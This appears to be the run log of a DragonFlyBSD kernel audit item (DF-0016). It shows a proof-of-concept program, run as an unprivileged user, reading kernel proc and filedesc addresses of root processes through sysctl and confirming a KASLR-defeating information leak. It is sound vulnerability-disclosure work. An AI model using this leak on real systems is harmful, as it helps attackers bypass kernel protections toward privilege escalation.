DragonFlyBSD Kernel Audit
DF-0016 / run.log
running as uid=1001 (./leak_kinfo); self pid=1843
reading kern.proc.pid.<pid> (KERN_PROC_PID -> PRISON_CHECK only, no p_trespass gate)

  pid 1843   uid=1001 comm=leak_kinfo      
      kp_paddr   = 0xfffff80066808280  (struct proc slab)
      kp_fd      = 0xfffff80066848940  (filedesc slab)
      kl_wchan   = 0x0000000000000000  
      kp_ktaddr  = 0x0000000000000000  
  pid 1      uid=0    comm=init            
      kp_paddr   = 0xfffff80066807880  (struct proc slab)
      kp_fd      = 0xfffff80066840ec0  (filedesc slab)
      kl_wchan   = 0xfffff80066807880  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 68     uid=0    comm=hammer2         
      kp_paddr   = 0xfffff800ab143280  (struct proc slab)
      kp_fd      = 0xfffff800ab163c40  (filedesc slab)
      kl_wchan   = 0xfffff80065c799f8  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 285    uid=0    comm=dhclient        
      kp_paddr   = 0xfffff8006680c880  (struct proc slab)
      kp_fd      = 0xfffff8006684c140  (filedesc slab)
      kl_wchan   = 0xfffff8006680c880  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 328    uid=0    comm=devd            
      kp_paddr   = 0xfffff800ab144180  (struct proc slab)
      kp_fd      = 0xfffff800ab1669c0  (filedesc slab)
      kl_wchan   = 0xfffff80067a5dff8  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 411    uid=0    comm=syslogd         
      kp_paddr   = 0xfffff800ab145080  (struct proc slab)
      kp_fd      = 0xfffff800ab167b40  (filedesc slab)
      kl_wchan   = 0xfffff80067a5e778  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 699    uid=0    comm=sshd            
      kp_paddr   = 0xfffff800ab144b80  (struct proc slab)
      kp_fd      = 0xfffff800ab1677c0  (filedesc slab)
      kl_wchan   = 0xfffff80067a5e4f8  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 730    uid=0    comm=cron            
      kp_paddr   = 0xfffff800ab144680  (struct proc slab)
      kp_fd      = 0xfffff800ab16a540  (filedesc slab)
      kl_wchan   = 0xffffffff8130f670  (wait channel)
      kp_ktaddr  = 0x0000000000000000  

=== stability check: read pid 1 three times, kp_paddr must match ===
  pid 1 kp_paddr: 0xfffff80066807880 / 0xfffff80066807880 / 0xfffff80066807880  (STABLE = real struct proc address)

result: 24 kernel pointers leaked across 8 processes
result: LEAK CONFIRMED (KASLR-defeat / slab-address primitive)
RUN_EXIT=0